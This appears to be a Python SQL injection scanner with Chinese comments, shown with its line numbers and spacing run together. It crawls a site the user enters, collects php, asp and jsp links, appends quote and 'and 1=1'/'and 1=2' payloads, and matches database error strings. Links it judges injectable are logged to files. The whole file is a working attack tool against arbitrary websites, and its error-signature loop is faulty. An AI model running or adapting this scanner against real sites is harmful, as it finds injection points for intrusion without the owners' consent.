1 importrequests,re,time,os2 from tqdm importtqdm3 from bs4 importBeautifulSoup4 defzhuru():5 globalx,headers,ps6 user=input('[+]Please enter the URL you want to test:') #使用者輸入要檢測的網站
7 url="{}".format(user.strip()) #去除兩邊的空格
8 headers={'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36'}9 request=requests.get(url,headers) #浏覽器頭
10 shoujiurl=[] #建立一個收集URL連結的清單
11 rse=request.content12 gwd=BeautifulSoup(rse,'html.parser')13 php=gwd.find_all(href=re.compile(r'php\?')) #尋找字尾名為php的連結
14 asp=gwd.find_all(href=re.compile(r'asp\?')) #尋找字尾名為asp的連結
15 jsp=gwd.find_all(href=re.compile(r'jsp\?')) #尋找字尾名為jsp的連結
16 print('[+]Collection URL')17 for i in tqdm(range(1,500)): #進度條
18 time.sleep(0.001) #進度條
19 for lk inphp:20 basd=lk.get('href') #提取其中的連結
21 shoujiurl.append(basd) #加入清單
22 for ba inasp:23 basd2=ba.get('href') #提取其中的連結
24 shoujiurl.append(basd2) #加入清單
25 for op injsp:26 basd3=op.get('href') #提取其中的連結
27 shoujiurl.append(basd3) #加入清單
28 print('[+]Collection completed')29
30
31 huixian=[]32 huixian1 = "is not a valid MySQL result resource"
33 huixian2 = "ODBC SQL Server Driver"
34 huixian3 = "Warning:ociexecute"
35 huixian4 = "Warning: pq_query[function.pg-query]"
36 huixian5 = "You have an error in your SQL syntax"
37 huixian6 = "Database Engine"
38 huixian7 = "Undefined variable"
39 huixian8 = "on line"
40 huixian9 = "mysql_fetch_array():"
41
42 huixian.append(huixian1)43 huixian.append(huixian2)44 huixian.append(huixian3)45 huixian.append(huixian4)46 huixian.append(huixian5)47 huixian.append(huixian6)48 huixian.append(huixian7)49 huixian.append(huixian8)50 huixian.append(huixian9)51 for g inhuixian:52 ps="".join(g) #過濾掉[]
53
54 payload0="'"
55 payload1="''"
56 payload2="%20and%201=1"
57 payload3="%20and%201=2"
58 for x inshoujiurl:59 yuan="".join(x) #過濾掉[]
60 ssdx="".join(x)+payload0 #添加payload
61 ssdx2="".join(x)+payload162 ssdx3="".join(x)+payload263 ssdx4="".join(x)+payload364 pdul=re.findall('[a-zA-z]+://[^\s]*',ssdx) #過濾掉一些殘缺不全的連結
65 pdul2=re.findall('[a-zA-z]+://[^\s]*',ssdx2)66 pdul3=re.findall('[a-zA-z]+://[^\s]*',yuan)67 pdul4=re.findall('[a-zA-z]+://[^\s]*',ssdx3)68 pdul5=re.findall('[a-zA-z]+://[^\s]*',ssdx4)69 psuw="".join(pdul) #過濾掉[]
70 psuw2="".join(pdul2)71 psuw3="".join(pdul3)72 psuw4="".join(pdul4)73 psuw5="".join(pdul5)74 try:75 resg=requests.get(url=psuw,headers=headers,timeout=6)76 resg2=requests.get(url=psuw2,headers=headers,timeout=6)77 resg3=requests.get(url=psuw3,headers=headers,timeout=6)78 resg4=requests.get(url=psuw4,headers=headers,timeout=6)79 resg5=requests.get(url=psuw5,headers=headers,timeout=6)80 if resg.status_code == 200: #判斷狀态碼是否等于200
81 print('[+]The first step is completed, and the goal is to be stable')82 time.sleep(1)83 if resg.content != resg2.content and resg3.content == resg2.content: #判斷是不是字元型注入
84
85 print('[+]Existence of character injection')86 print(resg3.url)87 print(resg3.url,file=open('character.txt','a')) #如果是寫入腳本
88 elif resg4.content != resg5.content and resg4.content == resg3.content: #判斷是不是數字型注入
89 print('[+]Digital injection')90 print(resg3.url)91 print(resg3.url,file=open('injection.txt','a')) #如果是寫入腳本
92 else: #兩者都不是
93 print('[+]Sorry, not character injection')94 print('[+]Sorry, not Digital injection')95 print(resg3.url)96 if ps instr(resg2.content):97 print('[+]The wrong sentence to be found',ps)98 elif resg.status_code != 200:99 print('http_stode:',resg.status_code)100 print('[-]Sorry, I cant tell if there is an injection')101 except:102 pass
103
104
105 zhuru()